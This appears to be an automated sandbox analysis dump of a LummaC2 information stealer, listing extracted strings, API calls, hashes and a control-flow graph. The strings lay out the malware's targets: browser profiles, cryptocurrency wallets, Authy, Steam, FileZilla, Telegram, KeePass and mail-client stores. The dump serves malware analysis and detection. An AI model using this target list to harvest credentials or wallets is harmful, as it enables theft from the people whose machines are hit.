76xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl$ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc$ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo
                                                              • API String ID: 4038537762-1377293222
                                                              • Opcode ID: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                              • Instruction ID: d3b4c8d05487b98e51841e16d8283d2e4e5c243acd67d22c1ca68150be5d60ea
                                                              • Opcode Fuzzy Hash: d76d7c670001a5dbd7c9de7b01bcafc77f6a8fb9cd7de87a96b03e98a683fc98
                                                              • Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F
                                                              Strings
                                                              • %programfiles%\Steam\config, xrefs: 0042DCB9
                                                              • CocCoc, xrefs: 0042DA7E
                                                              • Wall576xedets/Ele576xedctrum, xrefs: 0042EE9A
                                                              • %userprofile%, xrefs: 0042DC83
                                                              • %appdata%\Ledger Live, xrefs: 0042EAE5
                                                              • TT4, xrefs: 0042DF2F
                                                              • %appdata%\com.liberty.jaxx\IndexedDB, xrefs: 0042ED4F
                                                              • sitemanager.xml, xrefs: 0042DC67
                                                              • %locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data, xrefs: 0042DA33
                                                              • %appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta, xrefs: 0042EC90
                                                              • Import576xedant File576xeds/Pro576xedfile, xrefs: 0042F04F
                                                              • Ed576xedge, xrefs: 0042E788
                                                              • %userpro576xedfile%, xrefs: 0042DB79
                                                              • Applications/FileZilla, xrefs: 0042DC49, 0042DC4E, 0042DC66
                                                              • %appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble, xrefs: 0042D8E5
                                                              • TT4, xrefs: 0042EB40
                                                              • $jRk, xrefs: 0042DED9
                                                              • Aan(, xrefs: 0042DB43
                                                              • %programfiles%\Steam, xrefs: 0042DC9E
                                                              • %appdata%\Authy Desktop\Local Storage\leveldb, xrefs: 0042ED1D
                                                              • Applications/Telegram, xrefs: 0042DEF6
                                                              • Comodo, xrefs: 0042ECC2
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0042D700, 0042E5E2
                                                              • Applications/Steam/config, xrefs: 0042DCAF
                                                              • ST4, xrefs: 0042D951
                                                              • Mozi576xedlla Firef576xedox, xrefs: 0042D7E1
                                                              • ?, xrefs: 0042ECD4
                                                              • *.leveldb, xrefs: 0042ED4A
                                                              • %appdata%\AnyDesk, xrefs: 0042DC38
                                                              • Wallets/Exodus, xrefs: 0042EAC3
                                                              • Kom576xedeta, xrefs: 0042E818
                                                              • Wallets/Coinomi, xrefs: 0042ED00
                                                              • Wall576xedets/Eth576xedereum, xrefs: 0042EE17
                                                              • Wallets/JAXX New Version, xrefs: 0042ED45
                                                              • %appda576xedta%\Bina576xednce, xrefs: 0042DBB8, 0042DD8C, 0042EE79
                                                              • %localappdata%\Coinomi\Coinomi\wallets, xrefs: 0042ED06
                                                              • %appd576xedata%\El576xedectrum\wal576xedlets, xrefs: 0042E541
                                                              • %appd576xedata%\Ethe576xedreum, xrefs: 0042EA9E
                                                              • Wallets/Bitcoin core, xrefs: 0042ED2E
                                                              • Op576xedera G576xedX Stab576xedle, xrefs: 0042EBA1
                                                              • Wal576xedlets/Bi576xednance, xrefs: 0042DBD5
                                                              • %lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda, xrefs: 0042E957
                                                              • %loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta, xrefs: 0042E827
                                                              • *.576xedtxt, xrefs: 0042EEB6
                                                              • *.kbdx, xrefs: 0042DC7E
                                                              • Wallets/Electrum, xrefs: 0042ED60
                                                              • .fin576xedger-pr576xedint.fp, xrefs: 0042DD7C
                                                              • recentservers.xml, xrefs: 0042DC4F
                                                              • ap576xedp-sto576xedre.js576xedon, xrefs: 0042DBA9
                                                              • @an(, xrefs: 0042D868
                                                              • %appdata%\Electrum\wallets, xrefs: 0042ED66
                                                              • Applications/AnyDesk, xrefs: 0042DC2E
                                                              • sim576xedple-sto576xedrage.j576xedson, xrefs: 0042EE6A
                                                              • Chromi576xedum, xrefs: 0042E75F
                                                              • Op576xedera Sta576xedble, xrefs: 0042E4D1
                                                              • Wallets/Ledger Live, xrefs: 0042EADF
                                                              • *576xed, xrefs: 0042E532
                                                              • Chr576xedome, xrefs: 0042E948
                                                              • %appdata%\atomic\Local Storage\leveldb, xrefs: 0042ECEF
                                                              • %localappdata%\CocCoc\Browser\User Data, xrefs: 0042DA83
                                                              • Applications/KeePass, xrefs: 0042DC79
                                                              • q7 C, xrefs: 0042E450
                                                              • *.conf, xrefs: 0042DC33
                                                              • %appdata%\Telegram Desktop, xrefs: 0042DF00
                                                              • %localappdata%\BraveSoftware\Brave-Browser\User Data, xrefs: 0042ECB2
                                                              • Aan(, xrefs: 0042D889
                                                              • Wall576xedets/Binan576xedce, xrefs: 0042DB9A
                                                              • %localappdata%\Comodo\Dragon\User Data, xrefs: 0042ECC7
                                                              • %appdata%\Bitcoin\wallets, xrefs: 0042ED34
                                                              • Op576xedera Neo576xedn, xrefs: 0042EC81
                                                              • keyst576xedore, xrefs: 0042EE27
                                                              • %appdata%\Exodus\exodus.wallet, xrefs: 0042EACE
                                                              • ssfn*, xrefs: 0042DC99
                                                              • %appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles, xrefs: 0042D7F0
                                                              • Brave Software, xrefs: 0042ECAD
                                                              • Wallets/Atomic, xrefs: 0042ECE4
                                                              • %localappdata%\Chro576xedmium\Use576xedr Data, xrefs: 0042E76E
                                                              • y_B>, xrefs: 0042E011
                                                              • Wallets/Authy Desktop, xrefs: 0042ED17
                                                              • %appdata%\FileZilla, xrefs: 0042DC54, 0042DC59, 0042DC6C
                                                              • Wal576xedlets/Bin576xedance, xrefs: 0042EE5B
                                                              • %appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble, xrefs: 0042EBB0
                                                              • Applications/Steam, xrefs: 0042DC94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
                                                              • API String ID: 0-2545520832
                                                              • Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                              • Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
                                                              • Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                              • Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
                                                              • String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
                                                              • API String ID: 3760342818-3445073979
                                                              • Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                              • Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
                                                              • Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                              • Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B
                                                              APIs
                                                              • lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
                                                              • lstrcatW.KERNEL32(?,?), ref: 0040C427
                                                              • lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
                                                              • lstrlenW.KERNEL32(?), ref: 0040C581
                                                              • lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
                                                              • lstrlenW.KERNEL32(00001A2F), ref: 0040C901
                                                              • lstrlenW.KERNEL32(00001A2F), ref: 0040D826
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrlen$lstrcatlstrcmp
                                                              • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
                                                              • API String ID: 156957741-3266097529
                                                              • Opcode ID: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                              • Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
                                                              • Opcode Fuzzy Hash: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
                                                              • Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                              • GetProcessHeap.KERNEL32 ref: 004314B2
                                                              • HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
                                                              • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
                                                              • ReleaseDC.USER32(00000000,?), ref: 00432204
                                                              • GetProcessHeap.KERNEL32 ref: 004326F0
                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
                                                              • GetProcessHeap.KERNEL32 ref: 00432701
                                                              • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708
                                                              Strings
                                                              • y_B>, xrefs: 004314CE
                                                              • TT4, xrefs: 00431425
                                                              • y_B>, xrefs: 0043222D
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004318AA, 00431A4B
                                                              • q7 C, xrefs: 004317E9
                                                              • q7 C, xrefs: 00430F99
                                                              • ?, xrefs: 004325D3
                                                              • TT4, xrefs: 00432147
                                                              • $jRk, xrefs: 004313CB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$Process$Free$AllocAllocateBitsRelease
                                                              • String ID: $jRk$?$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                              • API String ID: 2023195035-2009061895
                                                              • Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                              • Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
                                                              • Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                              • Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B
                                                              APIs
                                                              • wsprintfW.USER32 ref: 004346DB
                                                              • RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
                                                              • RegCloseKey.KERNELBASE(?), ref: 0043475B
                                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
                                                              • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
                                                              • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close$EnumOpenwsprintf
                                                              • String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$y_B>$y_B>
                                                              • API String ID: 44529101-2968445494
                                                              • Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                              • Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
                                                              • Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                              • Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                              • API String ID: 0-3469262258
                                                              • Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                              • Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
                                                              • Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                              • Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
                                                              • lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
                                                              • lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
                                                              • API String ID: 4038537762-116603239
                                                              • Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                              • Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
                                                              • Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                              • Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
                                                              • API String ID: 4038537762-373908387
                                                              • Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                              • Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
                                                              • Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                              • Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4850 405aaa-405ac0 4851 405ac3 4850->4851 4852 405ac9-405ad1 4851->4852 4853 405ad3-405ad8 4852->4853 4854 405b3c-405b41 4852->4854 4857 405ade-405ae3 4853->4857 4858 405b7f-405b84 4853->4858 4855 405b43-405b48 4854->4855 4856 405bbb-405bc0 4854->4856 4861 405c2e-405c33 4855->4861 4862 405b4e-405b53 4855->4862 4859 405ca3-405ca8 4856->4859 4860 405bc6-405bcb 4856->4860 4865 405ae9-405aee 4857->4865 4866 405bfd-405c02 4857->4866 4863 405c54-405c59 4858->4863 4864 405b8a-405b8f 4858->4864 4869 405e71-405e76 4859->4869 4870 405cae-405cb3 4859->4870 4867 405bd1-405bd6 4860->4867 4868 405dab-405db0 4860->4868 4875 405e15-405e1a 4861->4875 4876 405c39-405c3e 4861->4876 4871 405d22-405d27 4862->4871 4872 405b59-405b5e 4862->4872 4879 405e3d-405e42 4863->4879 4880 405c5f-405c64 4863->4880 4877 405d74-405d79 4864->4877 4878 405b95-405b9a 4864->4878 4881 405af4-405af9 4865->4881 4882 405ce5-405cea 4865->4882 4873 405dc6-405dcb 4866->4873 4874 405c08-405c0d 4866->4874 4901 405bdc-405be1 4867->4901 4902 405fcd-405fda 4867->4902 4905 4060a2-4060b3 4868->4905 4906 405db6-405dbb 4868->4906 4889 405e7c-405e81 4869->4889 4890 40617d-406197 call 4052a1 4869->4890 4891 405cb9-405cbe 4870->4891 4892 40602c-40604e 4870->4892 4899 406077-40608c 4871->4899 4900 405d2d-405d32 4871->4900 4893 405b64-405b69 4872->4893 4894 405f1c-405f5c call 404edc call 4048e2 4872->4894 4909 405dd1-405dd6 4873->4909 4910 4060c3-4060dd 4873->4910 4907 405c13-405c18 4874->4907 4908 405fdf-406009 4874->4908 4913 405e20-405e25 4875->4913 4914 4060e6 4875->4914 4911 405c44-405c49 4876->4911 4912 406018-406027 lstrcatW 4876->4912 4903 406091-40609d 4877->4903 4904 405d7f-405d84 4877->4904 4897 405fa0-405fc8 call 404988 4878->4897 4898 405ba0-405ba5 4878->4898 4887 405e48-405e4d 4879->4887 4888 4060fe-406109 4879->4888 4883 405c6a-405c6f 4880->4883 4884 40615f-406166 call 447047 4880->4884 4885 405ebc-405ee8 lstrcatW call 4360e1 lstrcatW * 2 4881->4885 4886 405aff-405b04 4881->4886 4895 405cf0-405cf5 4882->4895 4896 406059-406070 4882->4896 4883->4852 4915 405c75-405c93 call 403600 4883->4915 4954 40616b-406178 4884->4954 4885->4852 4935 405b0a-405b0f 4886->4935 4936 405eed-405f17 lstrcatW call 4360e1 lstrcatW * 2 4886->4936 4887->4852 4937 405e53-405e5a call 447047 4887->4937 4925 40610b-406113 4888->4925 4926 40612e-406150 4888->4926 4889->4852 4938 405e87-405eac 4889->4938 4890->4852 4891->4852 4920 405cc4-405ce0 4891->4920 4916 406152 4892->4916 4917 406054 4892->4917 4939 405f6c-405f90 call 403600 4893->4939 4940 405b6f-405b74 4893->4940 4921 406157-40615a 4894->4921 4986 405f62-405f67 4894->4986 4895->4852 4923 405cfb-405d13 call 403e03 4895->4923 4918 406072 4896->4918 4919 4060df-4060e4 4896->4919 4897->4852 4898->4926 4942 405bab-405bb0 4898->4942 4899->4852 4900->4852 4927 405d38-405d64 4900->4927 4901->4852 4944 405be7-405bf8 lstrcatW 4901->4944 4902->4852 4903->4852 4904->4852 4929 405d8a-405d9b 4904->4929 4905->4921 4922 4060b9-4060be 4905->4922 4931 405dc1 4906->4931 4932 406115-406129 4906->4932 4907->4852 4945 405c1e-405c29 4907->4945 4949 406010-406013 4908->4949 4950 40600b 4908->4950 4909->4852 4933 405ddc-405e05 4909->4933 4910->4919 4910->4921 4947 40619c-4061d6 call 4038d5 call 403a1c 4911->4947 4948 405c4f 4911->4948 4912->4852 4913->4852 4934 405e2b-405e38 4913->4934 4924 4060e7 4914->4924 4915->4921 4979 405c99-405c9e 4915->4979 4916->4921 4917->4921 4918->4921 4919->4921 4920->4852 4921->4852 4922->4921 4962 405d16-405d1d 4923->4962 4924->4924 4925->4884 4925->4932 4926->4916 4926->4921 4927->4949 4953 405d6a-405d6f 4927->4953 4929->4921 4955 405da1-405da6 4929->4955 4931->4852 4932->4852 4933->4949 4958 405e0b-405e10 4933->4958 4934->4852 4935->4852 4959 405b11-405b31 4935->4959 4936->4852 4974 405e5f-405e6c 4937->4974 4938->4921 4961 405eb2-405eb7 4938->4961 4939->4921 4983 405f96-405f9b 4939->4983 4940->4962 4963 405b7a 4940->4963 4942->4852 4966 405bb6-40620a call 4360e1 call 40e14e 4942->4966 4944->4852 4945->4852 4987 4061d8 4947->4987 4988 4061dd-4061e0 4947->4988 4948->4852 4949->4852 4950->4949 4953->4949 4954->4852 4955->4921 4958->4949 4959->4919 4973 405b37 4959->4973 4961->4921 4962->4852 4963->4852 4973->4921 4974->4852 4979->4921 4983->4921 4986->4921 4987->4988 4988->4851
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
                                                              • lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
                                                              • lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
                                                              • lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
                                                              • lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
                                                              • lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
